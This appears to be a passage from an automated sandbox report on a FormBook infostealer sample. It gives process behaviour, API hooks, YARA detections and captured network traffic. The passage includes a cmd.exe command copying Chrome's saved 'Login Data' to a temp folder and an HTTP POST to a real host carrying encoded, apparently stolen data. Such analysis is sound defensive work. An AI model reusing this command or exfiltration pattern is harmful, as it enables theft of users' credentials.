                                    Data Ascii: 3f=jb4xiMTxb4q16b8Egkmd8DKvEvQT1KpTkE8533rbyfxSdpV47dZyP0X3gRwEVMBIQTpCm3Z9e-99aMz4QkK3h1jvSW0qowTfGpz5~oCrdMc4tc6Agkm7lLEYIlrKrC8zxbci510CYKA68Uw6Pb(rokvHjaLefj30whXxWzsWnayYMn1XmXjDOYdvOLkMVVKKM3Xo4wj_AxRK2b16csjbCLniaKqpHwQ90KnGXkA3G0phayOWqCjidBavsKuK863TABrk1YkxZou7dw1B4oAxveq9dalDCHlv9W0kYFTAunyZfDmKIDE2J2rfh5phGRTlhB9o(QK731BCcEB7aavE99sM(0Yd1eHPrzCw(j5K8BbCuux4xh4IzdfhJmofNpWehGKHTEsLJ1iuhOQuew).


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    5192.168.2.349841188.114.97.1080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    May 14, 2022 11:56:07.177649021 CEST11104OUTPOST /p12s/ HTTP/1.1
                                    Host: www.madurababe.net
                                    Connection: close
                                    Content-Length: 148780
                                    Cache-Control: no-cache
                                    Origin: http://www.madurababe.net
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://www.madurababe.net/p12s/
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate
                                    Data Raw: 33 66 3d 6a 62 34 78 69 49 4f 4b 5a 70 65 5f 78 4f 74 6a 68 33 65 46 34 43 36 44 41 76 39 66 38 39 45 69 74 7a 74 6e 33 30 7a 66 35 36 55 4e 58 5a 46 34 76 76 41 36 51 30 58 30 78 68 77 46 65 73 45 6f 4f 7a 41 42 6d 32 63 6f 65 2d 31 2d 52 70 7e 79 55 6b 4c 78 7a 46 75 4b 55 57 67 78 6f 31 4b 33 47 4c 66 68 31 49 4f 72 43 49 77 36 6f 2d 43 62 70 46 37 71 72 61 38 52 4f 6e 72 70 72 77 6f 68 78 35 68 31 7e 30 34 41 50 5a 63 6c 35 55 67 42 46 71 33 6b 6d 51 48 36 36 74 4b 61 51 69 37 77 78 6c 4b 4f 4b 68 45 52 75 4b 71 65 4a 67 35 31 6a 6c 50 55 49 4a 74 64 4f 4e 41 63 52 6d 65 68 61 41 58 67 33 69 47 6b 4c 6b 31 62 35 49 77 6e 50 34 43 74 41 4c 58 4e 48 59 7a 72 44 68 4d 53 33 49 76 57 61 68 55 6d 44 47 4e 74 43 33 79 75 72 78 4f 74 41 52 71 51 32 5a 4f 37 72 37 58 68 44 44 47 4c 28 59 6b 53 55 49 75 6e 56 6d 49 34 28 50 59 36 75 66 61 66 57 35 46 74 47 54 52 72 7e 56 51 33 48 30 62 46 6f 57 4f 76 55 53 32 63 5a 43 52 34 59 52 62 5f 6c 35 70 38 4c 7a 72 73 68 42 39 6b 28 56 7e 64 32 42 42 43 63 57 35 6f 63 37 76 2d 71 4e 73 46 73 30 49 62 73 2d 37 66 72 79 6d 77 75 42 68 7a 39 79 4c 43 70 39 35 37 78 44 41 49 67 39 66 68 45 47 70 2d 4e 5a 7a 70 74 48 43 71 56 32 63 51 44 67 48 42 6b 66 39 6a 4f 70 33 72 59 6c 51 62 77 79 62 76 30 7a 75 46 56 4b 32 59 42 74 67 2d 69 34 72 30 72 45 73 53 49 36 32 4f 48 48 6f 35 54 52 31 41 39 77 6c 34 49 50 76 39 54 46 54 64 4e 36 58 31 75 33 72 4a 63 52 32 4d 6c 6d 4c 78 65 59 74 73 28 36 6a 55 7a 45 37 6c 59 45 6b 2d 4c 6f 42 47 54 32 7a 77 37 47 6e 57 38 45 74 53 39 2d 4a 69 38 6e 41 56 76 75 35 78 71 70 44 62 73 79 68 41 35 77 71 72 56 54 77 68 7a 34 4a 71 4d 37 66 77 6b 6b 55 31 30 33 38 42 73 56 30 41 73 68 33 5f 58 67 64 4a 57 66 47 30 33 35 77 33 67 70 79 42 53 48 64 33 4d 32 32 42 47 4a 39 30 6d 38 78 79 62 46 4d 35 73 57 74 53 69 5a 53 4b 76 63 4e 44 39 45 72 79 31 5a 6f 6d 78 79 55 52 71 4d 6f 41 6b 4c 76 4b 79 34 59 58 5a 49 4d 57 4a 53 6b 75 67 4a 55 4d 37 32 39 67 30 75 47 55 45 50 35 31 68 6a 28 76 58 6d 4e 55 4e 53 45 2d 52 35 45 43 69 36 4b 4f 42 64 50 6f 53 4a 64 30 61 47 35 61 6e 61 4d 46 31 58 77 46 31 6f 50 54 62 38 42 62 36 62 49 55 79 51 71 59 35 69 76 4a 6c 62 79 56 7a 49 58 4d 64 50 4a 42 39 36 49 77 35 56 30 72 66 35 62 44 6e 59 68 34 72 53 37 4c 38 4a 5a 36 6f 30 63 33 6c 31 70 33 74 38 73 53 7a 39 54 4b 33 4e 62 43 43 31 32 7a 4d 34 62 72 68 63 51 48 35 33 70 64 55 51 62 4d 74 67 62 56 52 36 6c 6b 72 61 6d 5a 46 71 6d 79 71 48 76 48 32 67 37 55 61 57 46 4e 55 6a 64 59 6c 49 30 37 32 64 58 6b 71 5f 75 75 55 7a 69 41 4a 71 7e 46 4e 64 38 39 52 45 52 68 46 39 4f 73 72 4c 63 4e 5a 52 53 6e 78 76 6f 6c 68 6f 65 52 52 6c 39 61 52 77 28 30 49 58 64 33 28 58 63 33 4f 71 51 4a 4d 31 43 6d 39 44 6a 64 69 4d 41 72 57 55 52 62 46 69 69 70 75 52 63 59 47 4e 50 69 71 4f 44 78 5a 68 67 59 39 4f 4f 68 42 37 70 41 48 78 59 50 35 63 59 5f 4c 4c 35 49 51 54 65 54 5a 52 62 44 45 5a 39 45 43 4a 57 75 7a 50 55 75 74 53 30 71 36 4f 4e 58 45 56 34 4c 55 54 44 4c 4a 52 57 33 28 43 6d 58 64 48 6b 54 4c 69 56 75 33 54 55 61 41 35 47 4c 4c 71 76 73 72 45 44 75 6a 5f 56 6e 6f 4a 34 31 55 46 43 65 44 70 6a 6c 48 34 66 39 74 2d 43 51 46 68 69 59 62 4f 31 5a 6e 54 50 5a 37 41 30 6d 6b 57 6e 74 54 45 6e 48 4e 4f 49 59 59 64 68 43 6b 32 61 4e 6e 4d 6e 78 56 38 62 6e 44 72 72 65 77 38 57 4b 49 47 6a 50 36 76 5a 68 32 63 6a 2d 30 4f 33 38 70 41 55 32 51 51 62 43 50 7a 66 4f 76 30 48 76 41 76 62 45 67 65 4c 79 46 78 6b 7a 39 62 6b 55 54 31 58 65 53 49 28 31 62 56 66 70 7a 42 6d 6b 32 52 73 42 72 56 39 32 57 78 4a 49 46 46 42 63 6e 46 31 33 4a 54 59 32 4d 33 74 54 52 53 37 67 37 49 48 51 63 50 64 68 68 76 5a 6b 6f 69 47 39 32 37 68 30 7e 72 34 4e 62 31 45 50 48 45 32 69 49 73 79 44 4c 43 36 64 31 39 30 71 35 51 46 44 6e 38 31 66 55 65 5a 71 6b 59 74 37 50 45 6e 74 4e 6e 4e 57 32 74 49 39 6a 38 51 57 56 4e 47 42 32 75 45 6d 66 79 46 31 71 39 57 31 76 59 61 50 64 52 34 69 7a 30 30 58 37 65 39 6a 45 71 63 79 67 5a 35 30 36 6c 6b 6b 39 7a 63 64 69 30 76 45 34 77 7e 6f 45 37 62 48 56 69 74 64 70 70 6a 52 33 31 4a 53 4c 6e 28 6b 6a 45 37 38 35 44 7a 49 39 45 51 42 51 54 64 57 53 61 77 67 4b 4b 63 5f
                                    Data Ascii: 3f=jb4xiIOKZpe_xOtjh3eF4C6DAv9f89Eitztn30zf56UNXZF4vvA6Q0X0xhwFesEoOzABm2coe-1-Rp~yUkLxzFuKUWgxo1K3GLfh1IOrCIw6o-CbpF7qra8ROnrprwohx5h1~04APZcl5UgBFq3kmQH66tKaQi7wxlKOKhERuKqeJg51jlPUIJtdONAcRmehaAXg3iGkLk1b5IwnP4CtALXNHYzrDhMS3IvWahUmDGNtC3yurxOtARqQ2ZO7r7XhDDGL(YkSUIunVmI4(PY6ufafW5FtGTRr~VQ3H0bFoWOvUS2cZCR4YRb_l5p8LzrshB9k(V~d2BBCcW5oc7v-qNsFs0Ibs-7frymwuBhz9yLCp957xDAIg9fhEGp-NZzptHCqV2cQDgHBkf9jOp3rYlQbwybv0zuFVK2YBtg-i4r0rEsSI62OHHo5TR1A9wl4IPv9TFTdN6X1u3rJcR2MlmLxeYts(6jUzE7lYEk-LoBGT2zw7GnW8EtS9-Ji8nAVvu5xqpDbsyhA5wqrVTwhz4JqM7fwkkU1038BsV0Ash3_XgdJWfG035w3gpyBSHd3M22BGJ90m8xybFM5sWtSiZSKvcND9Ery1ZomxyURqMoAkLvKy4YXZIMWJSkugJUM729g0uGUEP51hj(vXmNUNSE-R5ECi6KOBdPoSJd0aG5anaMF1XwF1oPTb8Bb6bIUyQqY5ivJlbyVzIXMdPJB96Iw5V0rf5bDnYh4rS7L8JZ6o0c3l1p3t8sSz9TK3NbCC12zM4brhcQH53pdUQbMtgbVR6lkramZFqmyqHvH2g7UaWFNUjdYlI072dXkq_uuUziAJq~FNd89RERhF9OsrLcNZRSnxvolhoeRRl9aRw(0IXd3(Xc3OqQJM1Cm9DjdiMArWURbFiipuRcYGNPiqODxZhgY9OOhB7pAHxYP5cY_LL5IQTeTZRbDEZ9ECJWuzPUutS0q6ONXEV4LUTDLJRW3(CmXdHkTLiVu3TUaA5GLLqvsrEDuj_VnoJ41UFCeDpjlH4f9t-CQFhiYbO1ZnTPZ7A0mkWntTEnHNOIYYdhCk2aNnMnxV8bnDrrew8WKIGjP6vZh2cj-0O38pAU2QQbCPzfOv0HvAvbEgeLyFxkz9bkUT1XeSI(1bVfpzBmk2RsBrV92WxJIFFBcnF13JTY2M3tTRS7g7IHQcPdhhvZkoiG927h0~r4Nb1EPHE2iIsyDLC6d190q5QFDn81fUeZqkYt7PEntNnNW2tI9j8QWVNGB2uEmfyF1q9W1vYaPdR4iz00X7e9jEqcygZ506lkk9zcdi0vE4w~oE7bHVitdppjR31JSLn(kjE785DzI9EQBQTdWSawgKKc_UdDOGW(0Fo2wP04Mj5xkekYL5aJWggmaq3YQE4hvW2kPXkj8sM7QCd9OGv6cyXfk1MkFeB9yIdX0~P3Edh8KLJ9GJN6kcXY6QtE00rYitd4TrckbVdlrXjnR6gJ7TQdJ(x5h8ZhKzOdo1BoKoc2Ke-oQLrMQKSaUjpseN7lDix2f9OuAPsZqxY1d2j1bhDfm1DfmnGrhhWGXkvjdU_Ot96DmA0iEivdy8SrzsI1v6uo4D4nXdvf1wLbNfGQzbxR8Bff6EDXHkgxt68fkpfp3SWux4u5GgV4T6zyUzoq3QX5WCbC3qSo2i3gr48Cg~hr8vXurnBpEgBjXzJQzShs2e_Qo7PbsRvVTV4QHUr978agX3k3Gruh1~WVkzCcyGJdgSsQq4qOoT2evEp5A5OPISTpqIWFzdt~UcxGTs7U-x2mJjsO80Bw61LMz6GxTqoCN6s1c2I~2hw8UqBpwULcbDWgxe5HrIAM6jDCOuPSAM9d040lA8n7Rw1WjXwmiHebp1mJEKCF9KzZWkTt8HBNsNHnAPk(1nUQ9nNdL7R75kjH3IHoIsup3GAAu8dcLvd1xIBzFvN8O6vhPA2AvNAMJlz3MlCbVXLeU2Qd7T6xzRT1BAjznbZzD01VnK2qU~3GR3mSdlsCaT630HkkwIQqGW9zqdthDdn4oN7~_fm~jrjAQnI4Bqtd2sOqXNGmu(xNmpcSEW0N5yLhQb0uin_i8KBm8tMUaTf4bZ595lXmnlGd56p2R(DgHKFLo6KyBqkOMnUwNICbsHd4HLBmksISFtSWVTt9LFe2kzw6nRf7-21ZDbPvaj8KcpkCvgRURnO2nAWEh8_lA93YMcG0XUSStzdVd(YpOvDqTzMhxfGi3D8vSeTRXfTK70WtIF965yeFW1-2RuU7_SSTIPjEzU_QfJz6uASJB2n9FhB9XwVflwGOswGjzLGaLhwA03TjD(3WfvpyZGwNxhOAip43hzES3ZQxzWdXyzkPqWeinUTmuah8ytnwei6jdnIZG~VBc1A9hx2h94jKJFHeyuRD2mLAe3Pqb7yoyuwxwqhYKevOL926FIzUHraDtSqz2InBTV9w4pqwltrhtESdrK5niIdtkzSJARG~NbI1ijYT-Mplq9YaARkPRiyN6marIWF5sgasFFbEwi5tXqlbTd6Zrj8AnNPXBsA5WjWdH~lxqIvnh8ogV6s~5Gp~K48t-7BU-u32mbQDBi0LZTOKGShR4mTaNsgzzvQsUB9yJ9lA11cOj8JGyaJuE8BNZrdgCmznWslZHS0fRpDaDV6sCVYLwxeQglo7RFZtjJKUUX5iZOmaaacpCK2rriwZvLb0TKBts0uJQ7PN4Bf3CCMR1FWJLfNZEobRxpTdhG9nCqjI7a3o6XEQfXR41gpgo(H2Diwqz7pE6~XNE0fVa2iwmcvjX9qr8SDEGeybGp984sPimAdROfjNGmAz2Ijg7U1jQ4GGWBGqUAhTk82QwZ8eeZ-0cQ5SvDlmNtxRVqzx1lr2h3XTFAOkx(k03iAfEqGF5y7IQkSnyrGmH~YaSE3Y1L0u0J7hxcr37sOt5SGSzO30T5O9hvGe-SjQlW6p0oM91msU3i7g6OEafNHU99_3Hvof0NKYw4tWvmd0Otbok8ziUsJOWOO3ZD-v7D6PqhQk1eWuoZ0XcoghyjLNcYoXZIESgYN9WCqoovaKMmO5GYAnNn60btBxVm-7hyq27g2Kuum0Haf7N2JaZq_tZxypVPg7G3zVgQ95Mlre8FD3jZWi71ziQbdg0ufzZrvOh9k0Si60u(bGAmd136OJ5YPHwS2e4TCDTity-teoVzJbed9~mKSylGEmhmHd5fI8I6xvL99CrYrAZ3ZlIpc1VZvZBS5zeTANIa_BCBVgy1FnW2NR54Xtp4ALF~O0iNu9JLKfLxcdo3kDP39P_EPU-ZjVLKdQBpSp8GkLNZEtnPrrXS-ZPR56SL0wKuGANrApCXpjB~6gjUsDhmtj5rHBKy88-A7(j6yvu1ON-LGdNT3gqvNVkTd3tZFh1bkn4S7mc1V3rQp0mA83CUsv4OGoMqI2MaGvhs58psCY38ttJqXgeA1m6fGJbt_s0(ZCwmQ2yU2Bs9DZQcnTdh5X0RXvOthhvhQNujzoWdp592rpxTMe9Ia2_8_Ysp19mNjRXBAWod-rUVo~PCLVtRw68hda5DORkbV69FJ(JpsueGKAOGMUKFy9wj5NerrEgtUNzvjAPAXieDopu14qAKGGyIL8YHAPgALfdK-LNeKEuoGfZ5mSDmMsY~owl1VVgACmZkTa7AYusatE_OOibShu4jGFSjAsS75eVmysJwR30Z3cYMJ4Tx11TkzOSMQRnVN27P2eqgsjW3_emdDOj0GLSNxwngkG4XoGhUr43mhwQTv6uDh7Ua0SSN-8PzPr4Dhnb5eXtL_1-NWRzPpJQ9CDfP2OqqpI_S8aXNMPqb6CFdkUHrCtnyOXPFd(rnqmNqPqFP1SQxIEM27tSmgR-8G0M1sRbb0JgCmt2aQLhh6oww7pyGf4AxEDa(dYGVIHHPbx2nYNbjDfiayWgdmU-Zu(R26~An0bpW2pbzJHJfqB4n_cX0I9UFcr95zzmNFYdWPa1tofljTaxLZho06GHNqnqHeRUKUvzJZpkcfNHs1tnKD08Ci3JGXYalaC0pS5vgKlc~qWacw3j1QbwZy14OnQobVSm7d1PILaNQixG0mWLl-17xG1f(c7
                                    May 14, 2022 11:56:07.207608938 CEST11132INHTTP/1.1 301 Moved Permanently
                                    Date: Sat, 14 May 2022 09:56:07 GMT
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: max-age=3600
                                    Expires: Sat, 14 May 2022 10:56:07 GMT
                                    Location: https://www.madurababe.net/p12s/
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Vv%2FxHxLw6ASiG%2FDMjH0zkrN5D0gZNbe8Z8Pq%2FpY4vdAYqWdtwUe2dgBCxibKqEAZHZsEOF9TxwKGDsecH4pa9bokwciJAbmsQh1L0G2mXWnlkqgkAVeGh9CRXMT4yGTwxgGaWM%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Vary: Accept-Encoding
                                    Server: cloudflare
                                    CF-RAY: 70b2c318edbe8fee-FRA
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:11:54:06
                                    Start date:14/05/2022
                                    Path:C:\Users\user\Desktop\PO#12108997.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\PO#12108997.exe"
                                    Imagebase:0xfb0000
                                    File size:655872 bytes
                                    MD5 hash:5F6801FB007EDE49A68943EF905B54C6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Target ID:4
                                    Start time:11:54:20
                                    Start date:14/05/2022
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    Imagebase:0xf70000
                                    File size:2688096 bytes
                                    MD5 hash:B3A917344F5610BEEC562556F11300FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    General

                                    Target ID:5
                                    Start time:11:54:23
                                    Start date:14/05/2022
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff6b8cf0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Target ID:17
                                    Start time:11:54:55
                                    Start date:14/05/2022
                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                    Imagebase:0xb20000
                                    File size:36864 bytes
                                    MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    General

                                    Target ID:20
                                    Start time:11:55:09
                                    Start date:14/05/2022
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                    Imagebase:0xc20000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:22
                                    Start time:11:55:10
                                    Start date:14/05/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7c9170000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    No disassembly